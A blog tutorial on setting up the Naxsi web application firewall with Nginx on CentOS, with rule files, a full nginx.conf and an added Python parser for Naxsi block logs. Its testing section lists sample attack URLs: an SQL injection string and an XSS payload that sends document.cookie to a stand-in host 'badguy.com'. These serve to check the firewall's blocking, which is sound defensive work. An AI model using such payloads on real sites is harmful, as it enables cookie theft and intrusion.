CentOS Linux: Building a Web Application Firewall with Nginx and Naxsi

CentOS   Published: 2022-04-02   Published on: 大佬教程 (code.js-code.com)

Overview


Naxsi is an open-source, high-performance, low-maintenance web application firewall module for Nginx, the well-known web server and reverse proxy. Its goal is to help people protect their web applications against cross-site scripting, SQL injection, cross-site request forgery, and local and remote file inclusion attacks. Rather than signature lists, it scores each request against a small set of core rules and blocks once a score crosses a threshold you define per virtual host.

2. Download Naxsi

cd /data0/software/
wget https://github.com/nbs-system/naxsi/archive/master.zip
mv master.zip naxsi-master.zip
unzip naxsi-master.zip

3. Recompile Nginx with the naxsi module

cd ngx_openresty-1.4.3.6
./configure --user=www --group=www --prefix=/usr/local/openresty --with-luajit --with-http_stub_status_module --with-http_ssl_module --with-http_sub_module --with-http_realip_module --add-module=/data0/software/naxsi-master/naxsi_src
gmake
gmake install
cd ../

4. Copy Naxsi's core rule set

cp naxsi_config/naxsi_core.rules /usr/webserver/nginx/conf/

Define the security rules for one virtual host

vi /usr/webserver/nginx/conf/mysite.rules

with the following contents:

#LearningMode; #Enables learning mode: requests are scored and logged but never blocked
SecRulesEnabled;
#SecRulesDisabled;
DeniedUrl "/RequestDenied";

## check rules: block once a request's score for a category reaches the threshold
CheckRule "$SQL >= 8" BLOCK;
CheckRule "$RFI >= 8" BLOCK;
CheckRule "$TRAVERSAL >= 4" BLOCK;
CheckRule "$EVADE >= 4" BLOCK;
CheckRule "$XSS >= 8" BLOCK;

Edit nginx.conf

vi /usr/webserver/nginx/conf/nginx.conf

Add the following line to the http block:

include       naxsi_core.rules;

The full nginx.conf is as follows:

user  www www;

worker_processes 8;

error_log  /data1/logs/nginx_error.log  crit;

pid        /usr/webserver/nginx/nginx.pid;

#Specifies the value for maximum file descriptors that can be opened by this process.
worker_rlimit_nofile 65535;

events
{
  use epoll;
  worker_connections 65535;
}

http
{
  include       mime.types;
  include       naxsi_core.rules;
  default_type  application/octet-stream;

  #charset  gb2312;

  server_names_hash_bucket_size 128;
  client_header_buffer_size 32k;
  large_client_header_buffers 4 32k;
  client_max_body_size 8m;

  sendfile on;
  tcp_nopush     on;

  keepalive_timeout 60;

  tcp_nodelay on;
  server_tokens off;

  fastcgi_connect_timeout 300;
  fastcgi_send_timeout 300;
  fastcgi_read_timeout 300;
  fastcgi_buffer_size 64k;
  fastcgi_buffers 4 64k;
  fastcgi_busy_buffers_size 128k;
  fastcgi_temp_file_write_size 128k;

  gzip on;
  gzip_min_length  1k;
  gzip_buffers     4 16k;
  gzip_http_version 1.0;
  gzip_comp_level 2;
  gzip_types       text/plain application/x-javascript text/css application/xml;
  gzip_vary on;

  #limit_zone  crawler  $binary_remote_addr  10m;

  log_format  access  '$remote_addr - $remote_user [$time_local] "$request" '
               '$status $body_bytes_sent $upstream_response_time $request_time "$http_referer" '
               '"$http_user_agent" $http_x_forwarded_for "$server_name" "$http_host"';

  # The wwwlogs format string did not survive on the original page; a common
  # combined-style format is used here.
  log_format  wwwlogs  '$remote_addr - $remote_user [$time_local] "$request" '
               '$status $body_bytes_sent "$http_referer" '
               '"$http_user_agent" $http_x_forwarded_for';

  server
  {
    listen       80;
    server_name  blog.abc.com;
    index index.html index.htm index.php;
    root  /data0/htdocs/blog;

    #limit_conn   crawler  20;

    location ~ .*\.(php|php5)?$
    {
      #fastcgi_pass  unix:/tmp/php-cgi.sock;
      fastcgi_pass  127.0.0.1:9000;
      fastcgi_index index.php;
      include fcgi.conf;
    }

    location ~ .*\.(gif|jpg|jpeg|png|bmp|swf)$
    {
      expires      30d;
    }

    location ~ .*\.(js|css)?$
    {
      expires      1h;
    }

    access_log  /data1/logs/access.log  access;
  }

  # Naxsi is active only in this virtual host: mysite.rules is included in the
  # location that proxies to the backend, and DeniedUrl points at /RequestDenied.
  server
  {
    listen       80;
    server_name  www.abc.com;

    location /
    {
        include    mysite.rules;
        # the backend must not be this same server block, or requests will loop
        proxy_pass http://127.0.0.1/;
        proxy_set_header Host www.abc.com;
    }

    # Naxsi redirects blocked requests here internally; answer them with 403.
    location /RequestDenied
    {
        return 403;
    }

    access_log  /data1/logs/www.log  wwwlogs;
    # Naxsi writes a NAXSI_FMT line to the error log for every blocked (or, in learning mode, logged) request.
    error_log  /data1/logs/mysite_nginx_error.log debug;
  }

  server
  {
    listen       80;
    server_name  status.abc.com;
    location /
    {
      stub_status on;
      access_log   off;
    }
  }
}

5. Start Nginx

killall -9 nginx
/usr/webserver/nginx/sbin/nginx

6. Testing

http://www.abc.com/test.php?name=40/**/and/**/1=1    rejected: contains a conditional (SQL) injection
http://www.abc.com/test.php?name=%28%29              rejected: special characters
http://www.abc.com/test.php?term=%3Cscript%3Ewindow.open%28%22http://badguy.com?cookie=%22+document.cookie%29%3C/script%3E    rejected: parameter contains a script injection
http://www.abc.com/test.php?title=Meta%20http-equiv=%22refresh%22%20content=%220;%22    rejected

The requests filtered by naxsi can be inspected in /data1/logs/mysite_nginx_error.log.
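Two things a practitioner usually wants after reaching this point are a way to read those error-log entries without squinting at them, and a way to confirm that the CheckRule thresholds in mysite.rules explain why a given request was blocked. The following script is an added example, not code from the original post or from the Naxsi project: it parses NAXSI_FMT lines from the error log, evaluates each request's scores against the CheckRule lines of the rules file, and prints the BasicRule whitelist line you would add if a hit turns out to be a false positive. The log lines, IP addresses and counters in it are constructed samples; the NAXSI_FMT field layout and the "wl:<id> mz:..." whitelist syntax are Naxsi's own, while the function names are mine.

```python
"""Parse Naxsi NAXSI_FMT error-log lines and evaluate them against CheckRule
thresholds from a mysite.rules-style file.

Added example, not code from the original post or from the Naxsi project.
SAMPLE_RULES and SAMPLE_LOG are constructed; the NAXSI_FMT field layout
(ip=&server=&uri=&learning=&...&cscore0=$SQL&score0=8&zone0=ARGS&id0=1001&var0=name)
and the BasicRule wl:<id> "mz:..." whitelist syntax are Naxsi's own.
"""
import re
from urllib.parse import unquote

# Constructed copy of the rules file from the post (thresholds as given there).
SAMPLE_RULES = """\
#LearningMode;
SecRulesEnabled;
DeniedUrl "/RequestDenied";
CheckRule "$SQL >= 8" BLOCK;
CheckRule "$RFI >= 8" BLOCK;
CheckRule "$TRAVERSAL >= 4" BLOCK;
CheckRule "$EVADE >= 4" BLOCK;
CheckRule "$XSS >= 8" BLOCK;
"""

# Constructed error-log lines (addresses and counters invented, layout as Naxsi writes it).
SAMPLE_LOG = """\
2022/04/02 10:00:01 [error] 1234#0: *1 NAXSI_FMT: ip=203.0.113.5&server=www.abc.com&uri=/test.php&learning=0&vers=0.53&total_processed=10&total_blocked=3&block=1&cscore0=$SQL&score0=8&zone0=ARGS&id0=1001&var0=name, client: 203.0.113.5, server: www.abc.com, request: "GET /test.php?name=40/**/and/**/1=1 HTTP/1.1", host: "www.abc.com"
2022/04/02 10:00:02 [error] 1234#0: *2 NAXSI_FMT: ip=203.0.113.5&server=www.abc.com&uri=/test.php&learning=0&vers=0.53&total_processed=11&total_blocked=3&block=0&cscore0=$XSS&score0=4&zone0=ARGS&id0=1302&var0=title, client: 203.0.113.5, server: www.abc.com, request: "GET /test.php?title=a%3Cb HTTP/1.1", host: "www.abc.com"
"""

CHECKRULE_RE = re.compile(r'CheckRule\s+"\$(\w+)\s*(>=|>|<=|<|=)\s*(\d+)"\s+(\w+)\s*;')
FMT_RE = re.compile(r'NAXSI_FMT:\s*(\S+?),')
OPS = {'>=': lambda a, b: a >= b, '>': lambda a, b: a > b,
       '<=': lambda a, b: a <= b, '<': lambda a, b: a < b, '=': lambda a, b: a == b}


def parse_checkrules(text):
    """Return [(score_name, op, threshold, action)] for each CheckRule; '#' starts a comment."""
    rules = []
    for raw in text.splitlines():
        m = CHECKRULE_RE.match(raw.split('#', 1)[0].strip())
        if m:
            name, op, thr, action = m.groups()
            rules.append((name, op, int(thr), action.upper()))
    return rules


def parse_naxsi_fmt(line):
    """Extract one NAXSI_FMT record as a dict, or None if the line is not a Naxsi line."""
    m = FMT_RE.search(line)
    if not m:
        return None
    fields = {}
    for kv in m.group(1).split('&'):
        key, _, value = kv.partition('=')
        fields[key] = unquote(value)
    # Per-request totals: cscoreN names the counter ($SQL, $XSS, ...), scoreN is its value.
    scores, n = {}, 0
    while f'cscore{n}' in fields:
        scores[fields[f'cscore{n}'].lstrip('$')] = int(fields[f'score{n}'])
        n += 1
    # Individual rule hits: idN (rule id), zoneN (ARGS/BODY/HEADERS/URL), varN (parameter name).
    matches, n = [], 0
    while f'id{n}' in fields:
        matches.append((int(fields[f'id{n}']), fields[f'zone{n}'], fields.get(f'var{n}', '')))
        n += 1
    return {'ip': fields.get('ip'), 'server': fields.get('server'), 'uri': fields.get('uri'),
            'blocked': fields.get('block') == '1', 'learning': fields.get('learning') == '1',
            'scores': scores, 'matches': matches}


def triggered_rules(scores, rules):
    """Return the CheckRules satisfied by a request's scores (a missing counter counts as 0)."""
    return [r for r in rules if OPS[r[1]](scores.get(r[0], 0), r[2])]


def whitelist_for(match):
    """Build the BasicRule whitelist for one (id, zone, var) hit, the form used to tune false positives."""
    rule_id, zone, var = match
    if not var:
        return f'BasicRule wl:{rule_id} "mz:{zone}";'
    return f'BasicRule wl:{rule_id} "mz:${zone}_VAR:{var}";'


def analyse(log_text, rules_text):
    """Parse every Naxsi line in log_text and annotate it with the CheckRules it trips."""
    rules = parse_checkrules(rules_text)
    events = []
    for line in log_text.splitlines():
        ev = parse_naxsi_fmt(line)
        if ev:
            ev['triggered'] = triggered_rules(ev['scores'], rules)
            events.append(ev)
    return events


if __name__ == '__main__':
    for ev in analyse(SAMPLE_LOG, SAMPLE_RULES):
        state = 'BLOCKED' if ev['blocked'] else 'logged only'
        print(f"{ev['ip']} {ev['uri']} {state} scores={ev['scores']} "
              f"triggered={[r[0] for r in ev['triggered']]}")
        for hit in ev['matches']:
            print('  whitelist if false positive:', whitelist_for(hit))
```

Run it against the real file with the log contents in place of SAMPLE_LOG. The first sample line shows a request whose $SQL score of 8 meets the "$SQL >= 8" threshold and was blocked; the second accumulated only 4 points of $XSS, below the threshold of 8, so Naxsi logged it without blocking (the same line shape you see for everything when LearningMode is on). Only add a whitelist line once you have confirmed the parameter is legitimately allowed to carry that content; whitelisting by id and variable keeps the rule active everywhere else.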

Unless otherwise noted, the posts on this blog are original; when reproducing, please credit this article with a link to it. Original URL: http://blog.cnwyhx.com/?p=301
